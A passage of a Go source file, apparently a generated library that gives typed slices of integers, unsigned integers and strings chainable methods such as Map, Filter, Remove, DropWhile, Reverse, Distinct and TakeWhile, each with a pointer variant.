func (slice int32Slice) Reverse() int32Slice {
return ReverseInts32(slice)
}
// ReversePtr - reverse the list
func (slice int32SlicePtr) ReversePtr() int32SlicePtr {
return ReverseInts32Ptr(slice)
}
// Distinct - removes duplicates
func (slice int32Slice) Distinct() int32Slice {
return DistinctInt32(slice)
}
// DistinctPtr - removes duplicates
func (slice int32SlicePtr) DistinctPtr() int32SlicePtr {
return DistinctInt32Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int32Slice) TakeWhile(functors ...int32FunctorForFilter) int32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt32(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int32SlicePtr) TakeWhilePtr(functors ...int32FunctorForFilterPtr) int32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt32Ptr(f, tmpSlice)
}
return tmpSlice
}
type int16Slice []int16
type int16FunctorForMap func(int16) int16
type int16FunctorForFilter func(int16) bool
type int16SlicePtr []*int16
type int16FunctorForMapPtr func(*int16) *int16
type int16FunctorForFilterPtr func(*int16) bool
// MakeInt16Slice - creates slice for the functional method such as map, filter
func MakeInt16Slice(values ...int16) int16Slice {
newSlice := int16Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice int16Slice) Map(functors ...int16FunctorForMap) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt16(f, tmpSlice)
}
return tmpSlice
}
// MakeInt16SlicePtr - creates slice for the functional method such as map, filter
func MakeInt16SlicePtr(values ...*int16) int16SlicePtr {
newSlice := int16SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice int16SlicePtr) MapPtr(functors ...int16FunctorForMapPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice int16Slice) Filter(functors ...int16FunctorForFilter) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt16(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice int16SlicePtr) FilterPtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice int16Slice) Remove(functors ...int16FunctorForFilter) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt16(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice int16SlicePtr) RemovePtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice int16Slice) DropWhile(functors ...int16FunctorForFilter) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt16(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice int16SlicePtr) DropWhilePtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice int16Slice) Reverse() int16Slice {
return ReverseInts16(slice)
}
// ReversePtr - reverse the list
func (slice int16SlicePtr) ReversePtr() int16SlicePtr {
return ReverseInts16Ptr(slice)
}
// Distinct - removes duplicates
func (slice int16Slice) Distinct() int16Slice {
return DistinctInt16(slice)
}
// DistinctPtr - removes duplicates
func (slice int16SlicePtr) DistinctPtr() int16SlicePtr {
return DistinctInt16Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int16Slice) TakeWhile(functors ...int16FunctorForFilter) int16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt16(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int16SlicePtr) TakeWhilePtr(functors ...int16FunctorForFilterPtr) int16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt16Ptr(f, tmpSlice)
}
return tmpSlice
}
type int8Slice []int8
type int8FunctorForMap func(int8) int8
type int8FunctorForFilter func(int8) bool
type int8SlicePtr []*int8
type int8FunctorForMapPtr func(*int8) *int8
type int8FunctorForFilterPtr func(*int8) bool
// MakeInt8Slice - creates slice for the functional method such as map, filter
func MakeInt8Slice(values ...int8) int8Slice {
newSlice := int8Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice int8Slice) Map(functors ...int8FunctorForMap) int8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt8(f, tmpSlice)
}
return tmpSlice
}
// MakeInt8SlicePtr - creates slice for the functional method such as map, filter
func MakeInt8SlicePtr(values ...*int8) int8SlicePtr {
newSlice := int8SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice int8SlicePtr) MapPtr(functors ...int8FunctorForMapPtr) int8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapInt8Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice int8Slice) Filter(functors ...int8FunctorForFilter) int8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt8(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice int8SlicePtr) FilterPtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterInt8Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice int8Slice) Remove(functors ...int8FunctorForFilter) int8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt8(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice int8SlicePtr) RemovePtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveInt8Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice int8Slice) DropWhile(functors ...int8FunctorForFilter) int8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt8(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice int8SlicePtr) DropWhilePtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileInt8Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice int8Slice) Reverse() int8Slice {
return ReverseInts8(slice)
}
// ReversePtr - reverse the list
func (slice int8SlicePtr) ReversePtr() int8SlicePtr {
return ReverseInts8Ptr(slice)
}
// Distinct - removes duplicates
func (slice int8Slice) Distinct() int8Slice {
return DistinctInt8(slice)
}
// DistinctPtr - removes duplicates
func (slice int8SlicePtr) DistinctPtr() int8SlicePtr {
return DistinctInt8Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int8Slice) TakeWhile(functors ...int8FunctorForFilter) int8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt8(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice int8SlicePtr) TakeWhilePtr(functors ...int8FunctorForFilterPtr) int8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileInt8Ptr(f, tmpSlice)
}
return tmpSlice
}
type uintSlice []uint
type uintFunctorForMap func(uint) uint
type uintFunctorForFilter func(uint) bool
type uintSlicePtr []*uint
type uintFunctorForMapPtr func(*uint) *uint
type uintFunctorForFilterPtr func(*uint) bool
// MakeUintSlice - creates slice for the functional method such as map, filter
func MakeUintSlice(values ...uint) uintSlice {
newSlice := uintSlice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uintSlice) Map(functors ...uintFunctorForMap) uintSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint(f, tmpSlice)
}
return tmpSlice
}
// MakeUintSlicePtr - creates slice for the functional method such as map, filter
func MakeUintSlicePtr(values ...*uint) uintSlicePtr {
newSlice := uintSlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uintSlicePtr) MapPtr(functors ...uintFunctorForMapPtr) uintSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUintPtr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice uintSlice) Filter(functors ...uintFunctorForFilter) uintSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice uintSlicePtr) FilterPtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUintPtr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uintSlice) Remove(functors ...uintFunctorForFilter) uintSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uintSlicePtr) RemovePtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUintPtr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice uintSlice) DropWhile(functors ...uintFunctorForFilter) uintSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uintSlicePtr) DropWhilePtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUintPtr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice uintSlice) Reverse() uintSlice {
return ReverseUints(slice)
}
// ReversePtr - reverse the list
func (slice uintSlicePtr) ReversePtr() uintSlicePtr {
return ReverseUintsPtr(slice)
}
// Distinct - removes duplicates
func (slice uintSlice) Distinct() uintSlice {
return DistinctUint(slice)
}
// DistinctPtr - removes duplicates
func (slice uintSlicePtr) DistinctPtr() uintSlicePtr {
return DistinctUintPtr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uintSlice) TakeWhile(functors ...uintFunctorForFilter) uintSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uintSlicePtr) TakeWhilePtr(functors ...uintFunctorForFilterPtr) uintSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUintPtr(f, tmpSlice)
}
return tmpSlice
}
type uint64Slice []uint64
type uint64FunctorForMap func(uint64) uint64
type uint64FunctorForFilter func(uint64) bool
type uint64SlicePtr []*uint64
type uint64FunctorForMapPtr func(*uint64) *uint64
type uint64FunctorForFilterPtr func(*uint64) bool
// MakeUint64Slice - creates slice for the functional method such as map, filter
func MakeUint64Slice(values ...uint64) uint64Slice {
newSlice := uint64Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint64Slice) Map(functors ...uint64FunctorForMap) uint64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint64(f, tmpSlice)
}
return tmpSlice
}
// MakeUint64SlicePtr - creates slice for the functional method such as map, filter
func MakeUint64SlicePtr(values ...*uint64) uint64SlicePtr {
newSlice := uint64SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint64SlicePtr) MapPtr(functors ...uint64FunctorForMapPtr) uint64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice uint64Slice) Filter(functors ...uint64FunctorForFilter) uint64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint64(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice uint64SlicePtr) FilterPtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint64Slice) Remove(functors ...uint64FunctorForFilter) uint64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint64(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint64SlicePtr) RemovePtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint64Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint64Slice) DropWhile(functors ...uint64FunctorForFilter) uint64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint64(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint64SlicePtr) DropWhilePtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice uint64Slice) Reverse() uint64Slice {
return ReverseUint64s(slice)
}
// ReversePtr - reverse the list
func (slice uint64SlicePtr) ReversePtr() uint64SlicePtr {
return ReverseUint64sPtr(slice)
}
// Distinct - removes duplicates
func (slice uint64Slice) Distinct() uint64Slice {
return DistinctUint64(slice)
}
// DistinctPtr - removes duplicates
func (slice uint64SlicePtr) DistinctPtr() uint64SlicePtr {
return DistinctUint64Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint64Slice) TakeWhile(functors ...uint64FunctorForFilter) uint64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint64(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint64SlicePtr) TakeWhilePtr(functors ...uint64FunctorForFilterPtr) uint64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint64Ptr(f, tmpSlice)
}
return tmpSlice
}
type uint32Slice []uint32
type uint32FunctorForMap func(uint32) uint32
type uint32FunctorForFilter func(uint32) bool
type uint32SlicePtr []*uint32
type uint32FunctorForMapPtr func(*uint32) *uint32
type uint32FunctorForFilterPtr func(*uint32) bool
// MakeUint32Slice - creates slice for the functional method such as map, filter
func MakeUint32Slice(values ...uint32) uint32Slice {
newSlice := uint32Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint32Slice) Map(functors ...uint32FunctorForMap) uint32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint32(f, tmpSlice)
}
return tmpSlice
}
// MakeUint32SlicePtr - creates slice for the functional method such as map, filter
func MakeUint32SlicePtr(values ...*uint32) uint32SlicePtr {
newSlice := uint32SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint32SlicePtr) MapPtr(functors ...uint32FunctorForMapPtr) uint32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice uint32Slice) Filter(functors ...uint32FunctorForFilter) uint32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint32(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice uint32SlicePtr) FilterPtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint32Slice) Remove(functors ...uint32FunctorForFilter) uint32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint32(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint32SlicePtr) RemovePtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint32Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint32Slice) DropWhile(functors ...uint32FunctorForFilter) uint32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint32(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint32SlicePtr) DropWhilePtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint32Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice uint32Slice) Reverse() uint32Slice {
return ReverseUints32(slice)
}
// ReversePtr - reverse the list
func (slice uint32SlicePtr) ReversePtr() uint32SlicePtr {
return ReverseUints32Ptr(slice)
}
// Distinct - removes duplicates
func (slice uint32Slice) Distinct() uint32Slice {
return DistinctUint32(slice)
}
// DistinctPtr - removes duplicates
func (slice uint32SlicePtr) DistinctPtr() uint32SlicePtr {
return DistinctUint32Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint32Slice) TakeWhile(functors ...uint32FunctorForFilter) uint32Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint32(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint32SlicePtr) TakeWhilePtr(functors ...uint32FunctorForFilterPtr) uint32SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint32Ptr(f, tmpSlice)
}
return tmpSlice
}
type uint16Slice []uint16
type uint16FunctorForMap func(uint16) uint16
type uint16FunctorForFilter func(uint16) bool
type uint16SlicePtr []*uint16
type uint16FunctorForMapPtr func(*uint16) *uint16
type uint16FunctorForFilterPtr func(*uint16) bool
// MakeUint16Slice - creates slice for the functional method such as map, filter
func MakeUint16Slice(values ...uint16) uint16Slice {
newSlice := uint16Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint16Slice) Map(functors ...uint16FunctorForMap) uint16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint16(f, tmpSlice)
}
return tmpSlice
}
// MakeUint16SlicePtr - creates slice for the functional method such as map, filter
func MakeUint16SlicePtr(values ...*uint16) uint16SlicePtr {
newSlice := uint16SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint16SlicePtr) MapPtr(functors ...uint16FunctorForMapPtr) uint16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice uint16Slice) Filter(functors ...uint16FunctorForFilter) uint16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint16(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice uint16SlicePtr) FilterPtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint16Slice) Remove(functors ...uint16FunctorForFilter) uint16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint16(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint16SlicePtr) RemovePtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint16Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint16Slice) DropWhile(functors ...uint16FunctorForFilter) uint16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint16(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint16SlicePtr) DropWhilePtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint16Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice uint16Slice) Reverse() uint16Slice {
return ReverseUints16(slice)
}
// ReversePtr - reverse the list
func (slice uint16SlicePtr) ReversePtr() uint16SlicePtr {
return ReverseUints16Ptr(slice)
}
// Distinct - removes duplicates
func (slice uint16Slice) Distinct() uint16Slice {
return DistinctUint16(slice)
}
// DistinctPtr - removes duplicates
func (slice uint16SlicePtr) DistinctPtr() uint16SlicePtr {
return DistinctUint16Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint16Slice) TakeWhile(functors ...uint16FunctorForFilter) uint16Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint16(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint16SlicePtr) TakeWhilePtr(functors ...uint16FunctorForFilterPtr) uint16SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint16Ptr(f, tmpSlice)
}
return tmpSlice
}
type uint8Slice []uint8
type uint8FunctorForMap func(uint8) uint8
type uint8FunctorForFilter func(uint8) bool
type uint8SlicePtr []*uint8
type uint8FunctorForMapPtr func(*uint8) *uint8
type uint8FunctorForFilterPtr func(*uint8) bool
// MakeUint8Slice - creates slice for the functional method such as map, filter
func MakeUint8Slice(values ...uint8) uint8Slice {
newSlice := uint8Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice uint8Slice) Map(functors ...uint8FunctorForMap) uint8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint8(f, tmpSlice)
}
return tmpSlice
}
// MakeUint8SlicePtr - creates slice for the functional method such as map, filter
func MakeUint8SlicePtr(values ...*uint8) uint8SlicePtr {
newSlice := uint8SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice uint8SlicePtr) MapPtr(functors ...uint8FunctorForMapPtr) uint8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapUint8Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice uint8Slice) Filter(functors ...uint8FunctorForFilter) uint8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint8(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice uint8SlicePtr) FilterPtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterUint8Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice uint8Slice) Remove(functors ...uint8FunctorForFilter) uint8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint8(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice uint8SlicePtr) RemovePtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveUint8Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice uint8Slice) DropWhile(functors ...uint8FunctorForFilter) uint8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint8(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice uint8SlicePtr) DropWhilePtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileUint8Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice uint8Slice) Reverse() uint8Slice {
return ReverseUints8(slice)
}
// ReversePtr - reverse the list
func (slice uint8SlicePtr) ReversePtr() uint8SlicePtr {
return ReverseUints8Ptr(slice)
}
// Distinct - removes duplicates
func (slice uint8Slice) Distinct() uint8Slice {
return DistinctUint8(slice)
}
// DistinctPtr - removes duplicates
func (slice uint8SlicePtr) DistinctPtr() uint8SlicePtr {
return DistinctUint8Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint8Slice) TakeWhile(functors ...uint8FunctorForFilter) uint8Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint8(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice uint8SlicePtr) TakeWhilePtr(functors ...uint8FunctorForFilterPtr) uint8SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileUint8Ptr(f, tmpSlice)
}
return tmpSlice
}
type stringSlice []string
type stringFunctorForMap func(string) string
type stringFunctorForFilter func(string) bool
type stringSlicePtr []*string
type stringFunctorForMapPtr func(*string) *string
type stringFunctorForFilterPtr func(*string) bool
// MakeStrSlice - creates slice for the functional method such as map, filter
func MakeStrSlice(values ...string) stringSlice {
newSlice := stringSlice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice stringSlice) Map(functors ...stringFunctorForMap) stringSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapStr(f, tmpSlice)
}
return tmpSlice
}
// MakeStrSlicePtr - creates slice for the functional method such as map, filter
func MakeStrSlicePtr(values ...*string) stringSlicePtr {
newSlice := stringSlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice stringSlicePtr) MapPtr(functors ...stringFunctorForMapPtr) stringSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapStrPtr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice stringSlice) Filter(functors ...stringFunctorForFilter) stringSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterStr(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice stringSlicePtr) FilterPtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterStrPtr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice stringSlice) Remove(functors ...stringFunctorForFilter) stringSlice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveStr(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice stringSlicePtr) RemovePtr(functors ...stringFunctorForFilterPtr) stringSlicePtr {
tmpSlice := slice
for _, f := range functors {
